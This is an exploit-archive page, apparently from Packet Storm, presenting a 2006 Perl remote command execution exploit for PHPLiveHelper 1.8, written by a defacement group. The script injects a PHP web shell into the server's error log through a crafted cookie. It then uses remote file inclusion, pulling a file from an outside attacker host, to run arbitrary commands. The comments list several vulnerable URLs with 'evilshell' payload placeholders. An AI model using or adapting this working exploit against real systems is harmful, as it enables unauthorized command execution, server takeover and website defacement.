exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WD-TMPLH.txt

WD-TMPLH.txt
Posted Apr 1, 2006
Authored by rUnViRuS, Zod | Site worlddefacers.de

PHPLiveHelper version 1.8 remote command execution exploit.

tags | exploit, remote
SHA-256 | ceca173446a7363d1d1d93cf29b2fc8934649ad94204b53f42038112bb472d8f

WD-TMPLH.txt

Change Mirror Download
#!/usr/bin/perl -w
# PHPLiveHelper 1.8 remote command execution Xploit
#
# Discovered & Coded By rUnViRuS
# World Defacers TeaM
# WD-members: rUnViRuS - Papipsycho - r3v3ng4ns
# Details
# =======
# Note : PHPLiveHelper 1.8 is vulnerable too, but its just that you
# cannot include file remotly.
#
# phplivehelper/initiate.php?abs_path=Http://evilshell
# waiting.php?abs_path=Http://evilshell
# welcome.php?abs_path=Http://evilshell
# admin/index.php?abs_path=Http://evilshell
# javascript.php?abs_path=Http://evilshell
# checkchat.php?abs_path=Http://evilshell
# blank.php?abs_path=Http://evilshell
#
# if (isset($abs_path) && $abs_path != "") {
# include_once $abs_path."global.php";
# } else {
# include_once "./global.php";
# .
# .
# .
#
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
use IO::Socket;

print "\n=============================================================================\r\n";
print " * TheMindPHPLiveHelper 1.8 Remote Command Execution by www.worlddefacers.de *\r\n";
print "=============================================================================\r\n";
print "\n\n[*] WD-members: rUnViRuS - Papipsycho - r3v3ng4ns \n";
print "[*] Bug On :TheMindPHPLiveHelper 1.8 Software \n";
print "[*] Discovered & Coded By : rUnViRuS\n";
print "[*] Join with us to Get Prvi8 Exploit \n";
print "[*] www.worlddefacers.de\n\n\n";
print "============================================================================\r\n";
print " -=Coded by Zod, Bug Found by rUnViRuS=-\r\n";
print " www.worlddefacers.de - www.world-defacers.de\r\n";
print "============================================================================\r\n";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}

$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};

if (@ARGV < 3)
{
print "Usage:\r\n";
print "\n\n[*] usage: WD-TMPLH.pl <host> <Path> <cmd>\n";
print "[*] usage: WD-TMPLH.pl www.HosT.com /phplivehelper/ cmd (ls -ali\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";

$shell='<?php ob_clean();echo"Hi Master!\r\n";ini_set("max_execution_time",0);passthru($_GET[CMD]);die;?>';
$shell=urlEncode($shell);
$data="loginname=sun&passwd=sun";
print $sock "POST ".$path."users.php HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Content-Length: ".length($data)."\r\n";
print $sock "Cookie: gl_session=%27".$shell."\r\n";
print $sock "Connection: Close\r\n\r\n";
print $sock $data;
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";

$xpl="../logs/error.log";
$xpl=urlEncode($xpl)."%00";
print $sock "GET ".$path."initiate.php?abs_path=http://www.world-defacers.com/cmd.jpg?&cmd=".$cmd." HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Cookie: language=".$xpl.";\r\n";
print $sock "Connection: Close\r\n\r\n";

while ($answer = <$sock>) {
print $answer;
}
close($sock);
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close